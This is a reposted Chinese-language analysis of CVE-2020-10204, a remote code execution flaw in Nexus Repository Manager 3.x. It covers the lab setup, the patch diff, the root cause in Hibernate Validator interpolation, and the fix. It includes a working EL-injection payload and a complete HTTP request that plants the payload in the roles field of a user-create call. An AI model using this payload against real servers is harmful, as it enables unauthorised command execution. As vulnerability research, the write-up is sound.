转载

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

官方通告: https://support.sonatype.com/hc/en-us/articles/360044356194-CVE-2020-10204-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

影响版本: 所有以前的Nexus Repository Manager 3.x OSS / Pro最高版本包括3.21.1

修复版本:Nexus Repository Manager OSS / Pro 3.21.2版

环境搭建

使用 https://hub.docker.com/r/sonatype/nexus3/tags ,pull下漏洞版本的docker

docker pull sonatype/nexus3:3.21.1

然后切成root用户进入容器修改启动项 /opt/sonatype/nexus/bin/nexus

    run)

$INSTALL4J_JAVA_PREFIX exec "$app_java_home/bin/java"  -Xdebug -server -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8888 -Dinstall4j.jvmDir="$app_java_home" -Dexe4j.moduleName="$prg_dir/$progname" "-XX:+UnlockDiagnosticVMOptions" "-Dinstall4j.launcherId=245" "-Dinstall4j.swt=false" "$vmov_1" "$vmov_2" "$vmov_3" "$vmov_4" "$vmov_5" $INSTALL4J_ADD_VM_PARAMS -classpath "$local_classpath" com.install4j.runtime.launcher.UnixLauncher run 9d17dc87 0 0 org.sonatype.nexus.karaf.NexusMain
CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

然后在 https://github.com/sonatype/nexus-public 下载源码,导入idea,然后配好远程配置连上去即可调试。

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

漏洞分析

我们先来diff一下3.21.0和3.21.2的区别,找一下官方修复的痕迹

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

可以看到有很明显的漏洞修复痕迹,EL表达式注入的限制被绕过了,其实我们看到测试文件

@Test
  public void testStripJavaEl_bugged_interpolator() {
    String test = "$//A{badstuffinhere}";
    String result = underTest.stripJavaEl(test);
    assertThat(result, is("{badstuffinhere}"));
  }

也可以直接知道绕过方法,这里我直接给我rce的poc

$//A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('touch /tmp/sssss')}

为什么增加了 /A 还不影响表达式的解析呢,这个我后面说,先构造出完整poc

那么我们找一下哪些接口会使用

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

可以看到总过有三处,以第一处Roles为例,

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

可以找到有多处注解使用的地方,比如说新建用户/更新用户,构造Poc如下

POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 0.029301195082771514
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 350
Connection: close
Referer: http://127.0.0.1:8081/
Cookie: NX-ANTI-CSRF-TOKEN=0.029301195082771514; NXSESSIONID=7eaf0643-2707-445a-b17d-aedced6db8e5

{"action":"coreui_User","method":"create","data":[{"userId":"3","version":"","firstName":"test","lastName":"test","email":"test@test.com","status":"active","roles":["$//X{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('touch /tmp/rce')}"],"password":"admin"}],"type":"rpc","tid":33}
CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

以及其他几处注解使用的地方

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

还有一个问题为什么增加 /A 不会影响表达式的解析呢?

/org/hibernate/validator/hibernate-validator/6.1.0.Final/hibernate-validator-6.1.0.Final.jar!/org/hibernate/validator/messageinterpolation/AbstractMessageInterpolator.class 对传入的字符串进行了两次处理,

原本的字符串为 Missing roles: [$/B{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('touch /tmp/rce')}]

然后第一次处理后的结果

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

第二次处理后的结果

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

最后解析的还是 ${xxxx} 这样子。

我在3.21.1版本测试 $///B{} 这样也是可以执行的,但是增加替换规则只是限制了 A 啊,那这样不就还是可以绕过嘛?

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

然后我启了一个 3.21.2 版本的docker,测试发现并不行,很困惑,这里我跟一下原因。

在我跟到 /org/hibernate/validator/messageinterpolation/AbstractMessageInterpolator.class 发现大致调用堆栈是差不多的

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

但是再往下就有区别的,3.21.0版本调用了 /org/hibernate/validator/messageinterpolation/ResourceBundleMessageInterpolator.class@InterpolationTerm ,而3.21.2版本调用的是 /org/hibernate/validator/messageinterpolation/ParameterMessageInterpolator.class@InterpolationTerm ,但是最开始的区别并不是这里,这两个类都是继承了AbstractMessageInterpolator,然后重写的 public String interpolate(Context context, Locale locale, String term) 方法不同,

ParameterMessageInterpolator.class@InterpolationTerm 会进行表达式的检测

public String interpolate(Context context, Locale locale, String term) {
    if (InterpolationTerm.isElExpression(term)) {
        LOG.warnElIsUnsupported(term);
        return term;
    } else {
        ParameterTermResolver parameterTermResolver = new ParameterTermResolver();
        return parameterTermResolver.interpolate(context, term);
    }
}

如果表达式以 $ 开头,会直接打印warning,然后返回表达式字符串。

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

但是这里是hibernate包中的,我们需要去找到源头,也就是nexus开发者是怎么去修复的呢?

在一阵搜索中,我在 nexus-public-release-3.22.0-02/components/nexus-validation/src/main/java/org/sonatype/nexus/validation/ValidationModule.java 找到了

CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析

通过搜索资料了解到Hibernate Validator提供了ParameterMessageInterpolator来处理消息,并且不解析使用 $ 的表达式,也就是说即使绕过了replace的地方,也不会作为表达式进行解析,而是直接返回了。

原文  http://p0desta.com/2020/04/17/CVE-2020-10204 Nexus Repository Manager 3-远程执行代码漏洞分析/
正文到此结束
Loading...